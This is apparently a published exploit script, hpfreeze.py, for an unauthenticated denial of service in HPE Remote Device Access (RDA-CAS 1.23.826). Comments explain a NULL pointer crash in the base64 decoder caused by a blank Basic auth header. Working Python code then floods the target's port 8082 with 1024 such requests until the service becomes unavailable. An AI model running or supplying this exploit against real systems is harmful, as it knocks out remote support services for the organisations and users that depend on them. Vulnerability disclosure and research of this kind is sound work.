HPE RDA-CAS version 1.23.826 remote denial of service exploit.
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# hpfreeze.py
#
# HPE Remote Device Access Unauthenticated Denial of Service
#
# Jeremy Brown [jbrown3264/gmail]
# June 2021
#
# "Designed for the enterprise, HPE RDA (Remote Device Access) provides integrated remote
# connectivity for support automation, device telemetry and remote service delivery."
#
# More info: https://midway.ext.hpe.com
#
# rda-cas web server could not gracefully handle a blank or malformed BASIC auth string.
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x00007f4693362a5c in rda::base64_decode(std::string const&) () from /lib/librda.so.1
#
# Typical NULL ptr deref. It will automatically restart itself after handling one
# of these malformed requests, but quickly sending many of them will make the server
# give up on recovery and become unavailable to users. '=' instead of nothing for an
# auth string will also make it crash in a different parsing routine. The server can
# be configured at setup to listen on either localhost or the network interface.
#
# > ./hpfreeze.py rdacas-host
# ;p;P;p;P;p;P;p;P;p;P;p;P
#
# (If users have the web UI open, they may see "Connection to the RDA-CAS has been lost")
#
# Tested
# - RDA-CAS Version: 1.23.826
# -- rda-cas_1.23-826+deb10_amd64.deb
#
# Fix
# - "the issue will be remediated in an imminent release" with no further reply
#
import sys
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
DEFAULT_PORT = 8082
HOW_MANY_TIMES = 1024
class HPFreeze(object):
def __init__(self, args):
self.target = args.target
def run(self):
target = "https://" + self.target + ':' + str(DEFAULT_PORT)
session = requests.Session()
session.verify = False
# rocket science
headers = {'Authorization':"Basic"}
for i in range(HOW_MANY_TIMES):
try:
resp = session.post(target + "/", headers=headers)
except Exception as error:
if('RemoteDisconnected' in str(error)):
print(";p;P", end='')
print()
return 0
def arg_parse():
parser = argparse.ArgumentParser()
parser.add_argument("target",
type=str,
help="HPE RDA host")
args = parser.parse_args()
return args
def main():
args = arg_parse()
hpf = HPFreeze(args)
result = hpf.run()
if(result > 0):
sys.exit(-1)
if(__name__ == '__main__'):
main()
